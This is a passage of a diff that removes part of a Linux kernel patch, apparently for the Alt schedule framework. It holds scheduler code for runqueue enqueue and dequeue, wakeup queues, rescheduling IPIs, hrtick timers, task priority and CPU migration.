-+ * and DL, though, because they may not be coming in if only RT tasks are
-+ * active all the time (or there are RT tasks only).
-+ *
-+ * As a workaround for that issue, this function is called periodically by the
-+ * RT sched class to trigger extra cpufreq updates to prevent it from stalling,
-+ * but that really is a band-aid.  Going forward it should be replaced with
-+ * solutions targeted more specifically at RT tasks.
-+ */
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+	struct update_util_data *data;
-+
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+	data = rcu_dereference_sched(*per_cpu_ptr(&cpufreq_update_util_data,
-+						  cpu_of(rq)));
-+	if (data)
-+		data->func(data, rq_clock(rq), flags);
-+}
-+#else
-+static inline void cpufreq_update_util(struct rq *rq, unsigned int flags)
-+{
-+#ifdef CONFIG_SMP
-+	rq_load_update(rq);
-+#endif
-+}
-+#endif /* CONFIG_CPU_FREQ */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+/*
-+ * Tick may be needed by tasks in the runqueue depending on their policy and
-+ * requirements. If the tick is needed, let's send the target an IPI to kick
-+ * it out of nohz mode if necessary.
-+ */
-+static inline void sched_update_tick_dependency(struct rq *rq)
-+{
-+	int cpu = cpu_of(rq);
-+
-+	if (!tick_nohz_full_cpu(cpu))
-+		return;
-+
-+	if (rq->nr_running < 2)
-+		tick_nohz_dep_clear_cpu(cpu, TICK_DEP_BIT_SCHED);
-+	else
-+		tick_nohz_dep_set_cpu(cpu, TICK_DEP_BIT_SCHED);
-+}
-+#else /* !CONFIG_NO_HZ_FULL */
-+static inline void sched_update_tick_dependency(struct rq *rq) { }
-+#endif
-+
-+bool sched_task_on_rq(struct task_struct *p)
-+{
-+	return task_on_rq_queued(p);
-+}
-+
-+unsigned long get_wchan(struct task_struct *p)
-+{
-+	unsigned long ip = 0;
-+	unsigned int state;
-+
-+	if (!p || p == current)
-+		return 0;
-+
-+	/* Only get wchan if task is blocked and we can keep it that way. */
-+	raw_spin_lock_irq(&p->pi_lock);
-+	state = READ_ONCE(p->__state);
-+	smp_rmb(); /* see try_to_wake_up() */
-+	if (state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq)
-+		ip = __get_wchan(p);
-+	raw_spin_unlock_irq(&p->pi_lock);
-+
-+	return ip;
-+}
-+
-+/*
-+ * Add/Remove/Requeue task to/from the runqueue routines
-+ * Context: rq->lock
-+ */
-+#define __SCHED_DEQUEUE_TASK(p, rq, flags)					\
-+	sched_info_dequeue(rq, p);						\
-+	psi_dequeue(p, flags & DEQUEUE_SLEEP);					\
-+										\
-+	list_del(&p->sq_node);							\
-+	if (list_empty(&rq->queue.heads[p->sq_idx])) 				\
-+		clear_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
-+#define __SCHED_ENQUEUE_TASK(p, rq, flags)				\
-+	sched_info_enqueue(rq, p);					\
-+	psi_enqueue(p, flags & ENQUEUE_WAKEUP);				\
-+									\
-+	p->sq_idx = task_sched_prio_idx(p, rq);				\
-+	list_add_tail(&p->sq_node, &rq->queue.heads[p->sq_idx]);	\
-+	set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+
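-+/*
-+ * Note: the two macros above only maintain the stats hooks, the
-+ * per-priority list and the queue bitmap; the nr_running accounting and
-+ * the preempt-mask/tick updates are left to the callers below.
-+ */
-+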
-+static inline void dequeue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: dequeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: dequeue task residing on cpu%d from cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_DEQUEUE_TASK(p, rq, flags);
-+	--rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (1 == rq->nr_running)
-+		cpumask_clear_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void enqueue_task(struct task_struct *p, struct rq *rq, int flags)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	/*printk(KERN_INFO "sched: enqueue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: enqueue task residing on cpu%d to cpu%d\n",
-+		  task_cpu(p), cpu_of(rq));
-+
-+	__SCHED_ENQUEUE_TASK(p, rq, flags);
-+	update_sched_preempt_mask(rq);
-+	++rq->nr_running;
-+#ifdef CONFIG_SMP
-+	if (2 == rq->nr_running)
-+		cpumask_set_cpu(cpu_of(rq), &sched_rq_pending_mask);
-+#endif
-+
-+	sched_update_tick_dependency(rq);
-+}
-+
-+static inline void requeue_task(struct task_struct *p, struct rq *rq, int idx)
-+{
-+	lockdep_assert_held(&rq->lock);
-+	/*printk(KERN_INFO "sched: requeue(%d) %px %016llx\n", cpu_of(rq), p, p->priodl);*/
-+	WARN_ONCE(task_rq(p) != rq, "sched: cpu[%d] requeue task residing on cpu%d\n",
-+		  cpu_of(rq), task_cpu(p));
-+
-+	list_del(&p->sq_node);
-+	list_add_tail(&p->sq_node, &rq->queue.heads[idx]);
-+	if (idx != p->sq_idx) {
-+		if (list_empty(&rq->queue.heads[p->sq_idx]))
-+			clear_bit(sched_idx2prio(p->sq_idx, rq),
-+				  rq->queue.bitmap);
-+		p->sq_idx = idx;
-+		set_bit(sched_idx2prio(p->sq_idx, rq), rq->queue.bitmap);
-+		update_sched_preempt_mask(rq);
-+	}
-+}
-+
-+/*
-+ * cmpxchg-based fetch_or(), a macro so it works for different integer types
-+ */
-+#define fetch_or(ptr, mask)						\
-+	({								\
-+		typeof(ptr) _ptr = (ptr);				\
-+		typeof(mask) _mask = (mask);				\
-+		typeof(*_ptr) _val = *_ptr;				\
-+									\
-+		do {							\
-+		} while (!try_cmpxchg(_ptr, &_val, _val | _mask));	\
-+	_val;								\
-+})
-+
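-+/*
-+ * For instance (illustrative): old = fetch_or(&ti->flags, _TIF_NEED_RESCHED)
-+ * atomically ORs the flag in and yields the *previous* flags value, which
-+ * is what lets set_nr_and_not_polling() below test _TIF_POLLING_NRFLAG as
-+ * it was before the update.
-+ */
-+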
-+#if defined(CONFIG_SMP) && defined(TIF_POLLING_NRFLAG)
-+/*
-+ * Atomically set TIF_NEED_RESCHED and test for TIF_POLLING_NRFLAG,
-+ * this avoids any races wrt polling state changes and thereby avoids
-+ * spurious IPIs.
-+ */
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	return !(fetch_or(&ti->flags, _TIF_NEED_RESCHED) & _TIF_POLLING_NRFLAG);
-+}
-+
-+/*
-+ * Atomically set TIF_NEED_RESCHED if TIF_POLLING_NRFLAG is set.
-+ *
-+ * If this returns true, then the idle task promises to call
-+ * sched_ttwu_pending() and reschedule soon.
-+ */
-+static bool set_nr_if_polling(struct task_struct *p)
-+{
-+	struct thread_info *ti = task_thread_info(p);
-+	typeof(ti->flags) val = READ_ONCE(ti->flags);
-+
-+	for (;;) {
-+		if (!(val & _TIF_POLLING_NRFLAG))
-+			return false;
-+		if (val & _TIF_NEED_RESCHED)
-+			return true;
-+		if (try_cmpxchg(&ti->flags, &val, val | _TIF_NEED_RESCHED))
-+			break;
-+	}
-+	return true;
-+}
-+
-+#else
-+static inline bool set_nr_and_not_polling(struct task_struct *p)
-+{
-+	set_tsk_need_resched(p);
-+	return true;
-+}
-+
-+#ifdef CONFIG_SMP
-+static inline bool set_nr_if_polling(struct task_struct *p)
-+{
-+	return false;
-+}
-+#endif
-+#endif
-+
-+static bool __wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	struct wake_q_node *node = &task->wake_q;
-+
-+	/*
-+	 * Atomically grab the task; if ->wake_q is already !nil it means
-+	 * it's already queued (either by us or someone else) and will get the
-+	 * wakeup due to that.
-+	 *
-+	 * In order to ensure that a pending wakeup will observe our pending
-+	 * state, even in the failed case, an explicit smp_mb() must be used.
-+	 */
-+	smp_mb__before_atomic();
-+	if (unlikely(cmpxchg_relaxed(&node->next, NULL, WAKE_Q_TAIL)))
-+		return false;
-+
-+	/*
-+	 * The head is context local, there can be no concurrency.
-+	 */
-+	*head->lastp = node;
-+	head->lastp = &node->next;
-+	return true;
-+}
-+
-+/**
-+ * wake_q_add() - queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ */
-+void wake_q_add(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (__wake_q_add(head, task))
-+		get_task_struct(task);
-+}
-+
-+/**
-+ * wake_q_add_safe() - safely queue a wakeup for 'later' waking.
-+ * @head: the wake_q_head to add @task to
-+ * @task: the task to queue for 'later' wakeup
-+ *
-+ * Queue a task for later wakeup, most likely by the wake_up_q() call in the
-+ * same context, _HOWEVER_ this is not guaranteed, the wakeup can come
-+ * instantly.
-+ *
-+ * This function must be used as-if it were wake_up_process(); IOW the task
-+ * must be ready to be woken at this location.
-+ *
-+ * This function is essentially a task-safe equivalent to wake_q_add(). Callers
-+ * that already hold reference to @task can call the 'safe' version and trust
-+ * wake_q to do the right thing depending whether or not the @task is already
-+ * queued for wakeup.
-+ */
-+void wake_q_add_safe(struct wake_q_head *head, struct task_struct *task)
-+{
-+	if (!__wake_q_add(head, task))
-+		put_task_struct(task);
-+}
-+
-+void wake_up_q(struct wake_q_head *head)
-+{
-+	struct wake_q_node *node = head->first;
-+
-+	while (node != WAKE_Q_TAIL) {
-+		struct task_struct *task;
-+
-+		task = container_of(node, struct task_struct, wake_q);
-+		/* task can safely be re-inserted now: */
-+		node = node->next;
-+		task->wake_q.next = NULL;
-+
-+		/*
-+		 * wake_up_process() executes a full barrier, which pairs with
-+		 * the queueing in wake_q_add() so as not to miss wakeups.
-+		 */
-+		wake_up_process(task);
-+		put_task_struct(task);
-+	}
-+}
-+
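-+/*
-+ * Typical wake_q usage (a sketch, not taken from this file;
-+ * DEFINE_WAKE_Q() comes from <linux/sched/wake_q.h>): queue the wakeups
-+ * while a lock is held, then issue them after dropping it:
-+ *
-+ *	DEFINE_WAKE_Q(wake_q);
-+ *
-+ *	raw_spin_lock(&lock);
-+ *	wake_q_add(&wake_q, task);
-+ *	raw_spin_unlock(&lock);
-+ *
-+ *	wake_up_q(&wake_q);
-+ */
-+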
-+/*
-+ * resched_curr - mark rq's current task 'to be rescheduled now'.
-+ *
-+ * On UP this means setting the need_resched flag; on SMP it
-+ * might also involve a cross-CPU call to trigger the scheduler on
-+ * the target CPU.
-+ */
-+void resched_curr(struct rq *rq)
-+{
-+	struct task_struct *curr = rq->curr;
-+	int cpu;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	if (test_tsk_need_resched(curr))
-+		return;
-+
-+	cpu = cpu_of(rq);
-+	if (cpu == smp_processor_id()) {
-+		set_tsk_need_resched(curr);
-+		set_preempt_need_resched();
-+		return;
-+	}
-+
-+	if (set_nr_and_not_polling(curr))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+void resched_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	if (cpu_online(cpu) || cpu == smp_processor_id())
-+		resched_curr(cpu_rq(cpu));
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+}
-+
-+#ifdef CONFIG_SMP
-+#ifdef CONFIG_NO_HZ_COMMON
-+void nohz_balance_enter_idle(int cpu) {}
-+
-+void select_nohz_load_balancer(int stop_tick) {}
-+
-+void set_cpu_sd_state_idle(void) {}
-+
-+/*
-+ * In the semi-idle case, use the nearest busy CPU for migrating timers
-+ * from an idle CPU.  This is good for power savings.
-+ *
-+ * We don't do a similar optimization for a completely idle system, as
-+ * selecting an idle CPU would add more delay to the timers than intended
-+ * (as that CPU's timer base may not be up to date wrt jiffies etc.).
-+ */
-+int get_nohz_timer_target(void)
-+{
-+	int i, cpu = smp_processor_id(), default_cpu = -1;
-+	struct cpumask *mask;
-+	const struct cpumask *hk_mask;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TIMER)) {
-+		if (!idle_cpu(cpu))
-+			return cpu;
-+		default_cpu = cpu;
-+	}
-+
-+	hk_mask = housekeeping_cpumask(HK_TYPE_TIMER);
-+
-+	for (mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
-+	     mask < per_cpu(sched_cpu_topo_end_mask, cpu); mask++)
-+		for_each_cpu_and(i, mask, hk_mask)
-+			if (!idle_cpu(i))
-+				return i;
-+
-+	if (default_cpu == -1)
-+		default_cpu = housekeeping_any_cpu(HK_TYPE_TIMER);
-+	cpu = default_cpu;
-+
-+	return cpu;
-+}
-+
-+/*
-+ * When add_timer_on() enqueues a timer into the timer wheel of an
-+ * idle CPU then this timer might expire before the next timer event
-+ * which is scheduled to wake up that CPU. In case of a completely
-+ * idle system the next event might even be infinite time into the
-+ * future. wake_up_idle_cpu() ensures that the CPU is woken up and
-+ * leaves the inner idle loop so the newly added timer is taken into
-+ * account when the CPU goes back to idle and evaluates the timer
-+ * wheel for the next timer event.
-+ */
-+static inline void wake_up_idle_cpu(int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+
-+	if (cpu == smp_processor_id())
-+		return;
-+
-+	if (set_nr_and_not_polling(rq->idle))
-+		smp_send_reschedule(cpu);
-+	else
-+		trace_sched_wake_idle_without_ipi(cpu);
-+}
-+
-+static inline bool wake_up_full_nohz_cpu(int cpu)
-+{
-+	/*
-+	 * We just need the target to call irq_exit() and re-evaluate
-+	 * the next tick. The nohz full kick at least implies that.
-+	 * If needed we can still optimize that later with an
-+	 * empty IRQ.
-+	 */
-+	if (cpu_is_offline(cpu))
-+		return true;  /* Don't try to wake offline CPUs. */
-+	if (tick_nohz_full_cpu(cpu)) {
-+		if (cpu != smp_processor_id() ||
-+		    tick_nohz_tick_stopped())
-+			tick_nohz_full_kick_cpu(cpu);
-+		return true;
-+	}
-+
-+	return false;
-+}
-+
-+void wake_up_nohz_cpu(int cpu)
-+{
-+	if (!wake_up_full_nohz_cpu(cpu))
-+		wake_up_idle_cpu(cpu);
-+}
-+
-+static void nohz_csd_func(void *info)
-+{
-+	struct rq *rq = info;
-+	int cpu = cpu_of(rq);
-+	unsigned int flags;
-+
-+	/*
-+	 * Release the rq::nohz_csd.
-+	 */
-+	flags = atomic_fetch_andnot(NOHZ_KICK_MASK, nohz_flags(cpu));
-+	WARN_ON(!(flags & NOHZ_KICK_MASK));
-+
-+	rq->idle_balance = idle_cpu(cpu);
-+	if (rq->idle_balance && !need_resched()) {
-+		rq->nohz_idle_balance = flags;
-+		raise_softirq_irqoff(SCHED_SOFTIRQ);
-+	}
-+}
-+
-+#endif /* CONFIG_NO_HZ_COMMON */
-+#endif /* CONFIG_SMP */
-+
-+static inline void check_preempt_curr(struct rq *rq)
-+{
-+	if (sched_rq_first_task(rq) != rq->curr)
-+		resched_curr(rq);
-+}
-+
-+#ifdef CONFIG_SCHED_HRTICK
-+/*
-+ * Use HR-timers to deliver accurate preemption points.
-+ */
-+
-+static void hrtick_clear(struct rq *rq)
-+{
-+	if (hrtimer_active(&rq->hrtick_timer))
-+		hrtimer_cancel(&rq->hrtick_timer);
-+}
-+
-+/*
-+ * High-resolution timer tick.
-+ * Runs from hardirq context with interrupts disabled.
-+ */
-+static enum hrtimer_restart hrtick(struct hrtimer *timer)
-+{
-+	struct rq *rq = container_of(timer, struct rq, hrtick_timer);
-+
-+	WARN_ON_ONCE(cpu_of(rq) != smp_processor_id());
-+
-+	raw_spin_lock(&rq->lock);
-+	resched_curr(rq);
-+	raw_spin_unlock(&rq->lock);
-+
-+	return HRTIMER_NORESTART;
-+}
-+
-+/*
-+ * Use hrtick when:
-+ *  - enabled by features
-+ *  - hrtimer is actually high res
-+ */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	/**
-+	 * Alt schedule FW doesn't support sched_feat yet
-+	if (!sched_feat(HRTICK))
-+		return 0;
-+	*/
-+	if (!cpu_active(cpu_of(rq)))
-+		return 0;
-+	return hrtimer_is_hres_active(&rq->hrtick_timer);
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void __hrtick_restart(struct rq *rq)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	ktime_t time = rq->hrtick_time;
-+
-+	hrtimer_start(timer, time, HRTIMER_MODE_ABS_PINNED_HARD);
-+}
-+
-+/*
-+ * called from hardirq (IPI) context
-+ */
-+static void __hrtick_start(void *arg)
-+{
-+	struct rq *rq = arg;
-+
-+	raw_spin_lock(&rq->lock);
-+	__hrtick_restart(rq);
-+	raw_spin_unlock(&rq->lock);
-+}
-+
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	struct hrtimer *timer = &rq->hrtick_timer;
-+	s64 delta;
-+
-+	/*
-+	 * Don't schedule slices shorter than 10000ns; that just
-+	 * doesn't make sense and can cause timer DoS.
-+	 */
-+	delta = max_t(s64, delay, 10000LL);
-+
-+	rq->hrtick_time = ktime_add_ns(timer->base->get_time(), delta);
-+
-+	if (rq == this_rq())
-+		__hrtick_restart(rq);
-+	else
-+		smp_call_function_single_async(cpu_of(rq), &rq->hrtick_csd);
-+}
-+
-+#else
-+/*
-+ * Called to set the hrtick timer state.
-+ *
-+ * called with rq->lock held and irqs disabled
-+ */
-+void hrtick_start(struct rq *rq, u64 delay)
-+{
-+	/*
-+	 * Don't schedule slices shorter than 10000ns; that just
-+	 * doesn't make sense. Rely on vruntime for fairness.
-+	 */
-+	delay = max_t(u64, delay, 10000LL);
-+	hrtimer_start(&rq->hrtick_timer, ns_to_ktime(delay),
-+		      HRTIMER_MODE_REL_PINNED_HARD);
-+}
-+#endif /* CONFIG_SMP */
-+
-+static void hrtick_rq_init(struct rq *rq)
-+{
-+#ifdef CONFIG_SMP
-+	INIT_CSD(&rq->hrtick_csd, __hrtick_start, rq);
-+#endif
-+
-+	hrtimer_init(&rq->hrtick_timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL_HARD);
-+	rq->hrtick_timer.function = hrtick;
-+}
-+#else	/* CONFIG_SCHED_HRTICK */
-+static inline int hrtick_enabled(struct rq *rq)
-+{
-+	return 0;
-+}
-+
-+static inline void hrtick_clear(struct rq *rq)
-+{
-+}
-+
-+static inline void hrtick_rq_init(struct rq *rq)
-+{
-+}
-+#endif	/* CONFIG_SCHED_HRTICK */
-+
-+static inline int __normal_prio(int policy, int rt_prio, int static_prio)
-+{
-+	return rt_policy(policy) ? (MAX_RT_PRIO - 1 - rt_prio) :
-+		static_prio + MAX_PRIORITY_ADJ;
-+}
-+
-+/*
-+ * Calculate the expected normal priority: i.e. priority
-+ * without taking RT-inheritance into account. Might be
-+ * boosted by interactivity modifiers. Changes upon fork,
-+ * setprio syscalls, and whenever the interactivity
-+ * estimator recalculates.
-+ */
-+static inline int normal_prio(struct task_struct *p)
-+{
-+	return __normal_prio(p->policy, p->rt_priority, p->static_prio);
-+}
-+
-+/*
-+ * Calculate the current priority, i.e. the priority
-+ * taken into account by the scheduler. This value might
-+ * be boosted by RT tasks as it will be RT if the task got
-+ * RT-boosted. If not then it returns p->normal_prio.
-+ */
-+static int effective_prio(struct task_struct *p)
-+{
-+	p->normal_prio = normal_prio(p);
-+	/*
-+	 * If we are RT tasks or we were boosted to RT priority,
-+	 * keep the priority unchanged. Otherwise, update priority
-+	 * to the normal priority:
-+	 */
-+	if (!rt_prio(p->prio))
-+		return p->normal_prio;
-+	return p->prio;
-+}
-+
-+/*
-+ * activate_task - move a task to the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static void activate_task(struct task_struct *p, struct rq *rq)
-+{
-+	enqueue_task(p, rq, ENQUEUE_WAKEUP);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+
-+	/*
-+	 * If in_iowait is set, the code below may not trigger any cpufreq
-+	 * utilization updates, so do it here explicitly with the IOWAIT flag
-+	 * passed.
-+	 */
-+	cpufreq_update_util(rq, SCHED_CPUFREQ_IOWAIT * p->in_iowait);
-+}
-+
-+/*
-+ * deactivate_task - remove a task from the runqueue.
-+ *
-+ * Context: rq->lock
-+ */
-+static inline void deactivate_task(struct task_struct *p, struct rq *rq)
-+{
-+	dequeue_task(p, rq, DEQUEUE_SLEEP);
-+	p->on_rq = 0;
-+	cpufreq_update_util(rq, 0);
-+}
-+
-+static inline void __set_task_cpu(struct task_struct *p, unsigned int cpu)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * After ->cpu is set up to a new value, task_access_lock(p, ...) can be
-+	 * successfully executed on another CPU. We must ensure that updates of
-+	 * per-task data have been completed by this moment.
-+	 */
-+	smp_wmb();
-+
-+	WRITE_ONCE(task_thread_info(p)->cpu, cpu);
-+#endif
-+}
-+
-+static inline bool is_migration_disabled(struct task_struct *p)
-+{
-+#ifdef CONFIG_SMP
-+	return p->migration_disabled;
-+#else
-+	return false;
-+#endif
-+}
-+
-+#define SCA_CHECK		0x01
-+#define SCA_USER		0x08
-+
-+#ifdef CONFIG_SMP
-+
-+void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
-+{
-+#ifdef CONFIG_SCHED_DEBUG
-+	unsigned int state = READ_ONCE(p->__state);
-+
-+	/*
-+	 * We should never call set_task_cpu() on a blocked task,
-+	 * ttwu() will sort out the placement.
-+	 */
-+	WARN_ON_ONCE(state != TASK_RUNNING && state != TASK_WAKING && !p->on_rq);
-+
-+#ifdef CONFIG_LOCKDEP
-+	/*
-+	 * The caller should hold either p->pi_lock or rq->lock, when changing
-+	 * a task's CPU. ->pi_lock for waking tasks, rq->lock for runnable tasks.
-+	 *
-+	 * sched_move_task() holds both and thus holding either pins the cgroup,
-+	 * see task_group().
-+	 */
-+	WARN_ON_ONCE(debug_locks && !(lockdep_is_held(&p->pi_lock) ||
-+				      lockdep_is_held(&task_rq(p)->lock)));
-+#endif
-+	/*
-+	 * Clearly, migrating tasks to offline CPUs is a fairly daft thing.
-+	 */
-+	WARN_ON_ONCE(!cpu_online(new_cpu));
-+
-+	WARN_ON_ONCE(is_migration_disabled(p));
-+#endif
-+	trace_sched_migrate_task(p, new_cpu);
-+
-+	if (task_cpu(p) != new_cpu) {
-+		rseq_migrate(p);
-+		perf_event_task_migrate(p);
-+	}
-+
-+	__set_task_cpu(p, new_cpu);
-+}
-+
-+#define MDF_FORCE_ENABLED	0x80
-+
-+static void
-+__do_set_cpus_ptr(struct task_struct *p, const struct cpumask *new_mask)
-+{
-+	/*
-+	 * This here violates the locking rules for affinity, since we're only
-+	 * supposed to change these variables while holding both rq->lock and
-+	 * p->pi_lock.
-+	 *
-+	 * HOWEVER, it magically works, because ttwu() is the only code that
-+	 * accesses these variables under p->pi_lock and only does so after
-+	 * smp_cond_load_acquire(&p->on_cpu, !VAL), and we're in __schedule()
-+	 * before finish_task().
-+	 *
-+	 * XXX do further audits, this smells like something putrid.
-+	 */
-+	SCHED_WARN_ON(!p->on_cpu);
-+	p->cpus_ptr = new_mask;
-+}
-+
-+void migrate_disable(void)
-+{
-+	struct task_struct *p = current;
-+	int cpu;
-+
-+	if (p->migration_disabled) {
-+		p->migration_disabled++;
-+		return;
-+	}
-+
-+	preempt_disable();
-+	cpu = smp_processor_id();
-+	if (cpumask_test_cpu(cpu, &p->cpus_mask)) {
-+		cpu_rq(cpu)->nr_pinned++;
-+		p->migration_disabled = 1;
-+		p->migration_flags &= ~MDF_FORCE_ENABLED;
-+
-+		/*
-+		 * Violates locking rules! see comment in __do_set_cpus_ptr().
-+		 */
-+		if (p->cpus_ptr == &p->cpus_mask)
-+			__do_set_cpus_ptr(p, cpumask_of(cpu));
-+	}
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_disable);
-+
-+void migrate_enable(void)
-+{
-+	struct task_struct *p = current;
-+
-+	if (!p->migration_disabled)
-+		return;
-+
-+	if (p->migration_disabled > 1) {
-+		p->migration_disabled--;
-+		return;
-+	}
-+
-+	if (WARN_ON_ONCE(!p->migration_disabled))
-+		return;
-+
-+	/*
-+	 * Ensure stop_task runs either before or after this, and that
-+	 * __set_cpus_allowed_ptr(SCA_MIGRATE_ENABLE) doesn't schedule().
-+	 */
-+	preempt_disable();
-+	/*
-+	 * Assumption: current should be running on an allowed CPU.
-+	 */
-+	WARN_ON_ONCE(!cpumask_test_cpu(smp_processor_id(), &p->cpus_mask));
-+	if (p->cpus_ptr != &p->cpus_mask)
-+		__do_set_cpus_ptr(p, &p->cpus_mask);
-+	/*
-+	 * Mustn't clear migration_disabled() until cpus_ptr points back at the
-+	 * regular cpus_mask, otherwise things that race (eg.
-+	 * select_fallback_rq) get confused.
-+	 */
-+	barrier();
-+	p->migration_disabled = 0;
-+	this_rq()->nr_pinned--;
-+	preempt_enable();
-+}
-+EXPORT_SYMBOL_GPL(migrate_enable);
-+
-+static inline bool rq_has_pinned_tasks(struct rq *rq)
-+{
-+	return rq->nr_pinned;
-+}
-+
-+/*
-+ * Per-CPU kthreads are allowed to run on !active && online CPUs, see
-+ * __set_cpus_allowed_ptr() and select_fallback_rq().
-+ */
-+static inline bool is_cpu_allowed(struct task_struct *p, int cpu)
-+{
-+	/* When not in the task's cpumask, no point in looking further. */
-+	if (!cpumask_test_cpu(cpu, p->cpus_ptr))
-+		return false;
-+
-+	/* migrate_disabled() must be allowed to finish. */
-+	if (is_migration_disabled(p))
-+		return cpu_online(cpu);
-+
-+	/* Non kernel threads are not allowed during either online or offline. */
-+	if (!(p->flags & PF_KTHREAD))
-+		return cpu_active(cpu) && task_cpu_possible(cpu, p);
-+
-+	/* KTHREAD_IS_PER_CPU is always allowed. */
-+	if (kthread_is_per_cpu(p))
-+		return cpu_online(cpu);
-+
-+	/* Regular kernel threads don't get to stay during offline. */
-+	if (cpu_dying(cpu))
-+		return false;
-+
-+	/* But are allowed during online. */
-+	return cpu_online(cpu);
-+}
-+
-+/*
-+ * This is how migration works:
-+ *
-+ * 1) we invoke migration_cpu_stop() on the target CPU using
-+ *    stop_one_cpu().
-+ * 2) stopper starts to run (implicitly forcing the migrated thread
-+ *    off the CPU)
-+ * 3) it checks whether the migrated task is still in the wrong runqueue.
-+ * 4) if it's in the wrong runqueue then the migration thread removes
-+ *    it and puts it into the right queue.
-+ * 5) stopper completes and stop_one_cpu() returns and the migration
-+ *    is done.
-+ */
-+
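-+/*
-+ * In code form (a sketch of the sequence above; struct migration_arg and
-+ * migration_cpu_stop() are defined just below, and affine_move_task()
-+ * later in this file is a real caller):
-+ *
-+ *	struct migration_arg arg = { p, dest_cpu };
-+ *
-+ *	stop_one_cpu(cpu_of(rq), migration_cpu_stop, &arg);
-+ */
-+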
-+/*
-+ * move_queued_task - move a queued task to new rq.
-+ *
-+ * Returns (locked) new rq. Old rq's lock is released.
-+ */
-+static struct rq *move_queued_task(struct rq *rq, struct task_struct *p,
-+				   int new_cpu)
-+{
-+	lockdep_assert_held(&rq->lock);
-+
-+	WRITE_ONCE(p->on_rq, TASK_ON_RQ_MIGRATING);
-+	dequeue_task(p, rq, 0);
-+	update_sched_preempt_mask(rq);
-+	set_task_cpu(p, new_cpu);
-+	raw_spin_unlock(&rq->lock);
-+
-+	rq = cpu_rq(new_cpu);
-+
-+	raw_spin_lock(&rq->lock);
-+	WARN_ON_ONCE(task_cpu(p) != new_cpu);
-+	sched_task_sanity_check(p, rq);
-+	enqueue_task(p, rq, 0);
-+	p->on_rq = TASK_ON_RQ_QUEUED;
-+	check_preempt_curr(rq);
-+
-+	return rq;
-+}
-+
-+struct migration_arg {
-+	struct task_struct *task;
-+	int dest_cpu;
-+};
-+
-+/*
-+ * Move (not current) task off this CPU, onto the destination CPU. We're doing
-+ * this because either it can't run here any more (set_cpus_allowed()
-+ * away from this CPU, or CPU going down), or because we're
-+ * attempting to rebalance this task on exec (sched_exec).
-+ *
-+ * So we race with normal scheduler movements, but that's OK, as long
-+ * as the task is no longer on this CPU.
-+ */
-+static struct rq *__migrate_task(struct rq *rq, struct task_struct *p,
-+				 int dest_cpu)
-+{
-+	/* Affinity changed (again). */
-+	if (!is_cpu_allowed(p, dest_cpu))
-+		return rq;
-+
-+	update_rq_clock(rq);
-+	return move_queued_task(rq, p, dest_cpu);
-+}
-+
-+/*
-+ * migration_cpu_stop - this will be executed by a highprio stopper thread
-+ * and performs thread migration by bumping thread off CPU then
-+ * 'pushing' onto another runqueue.
-+ */
-+static int migration_cpu_stop(void *data)
-+{
-+	struct migration_arg *arg = data;
-+	struct task_struct *p = arg->task;
-+	struct rq *rq = this_rq();
-+	unsigned long flags;
-+
-+	/*
-+	 * The original target CPU might have gone down and we might
-+	 * be on another CPU but it doesn't matter.
-+	 */
-+	local_irq_save(flags);
-+	/*
-+	 * We need to explicitly wake pending tasks before running
-+	 * __migrate_task() such that we will not miss enforcing cpus_ptr
-+	 * during wakeups, see set_cpus_allowed_ptr()'s TASK_WAKING test.
-+	 */
-+	flush_smp_call_function_queue();
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+	/*
-+	 * If task_rq(p) != rq, it cannot be migrated here, because we're
-+	 * holding rq->lock, if p->on_rq == 0 it cannot get enqueued because
-+	 * we're holding p->pi_lock.
-+	 */
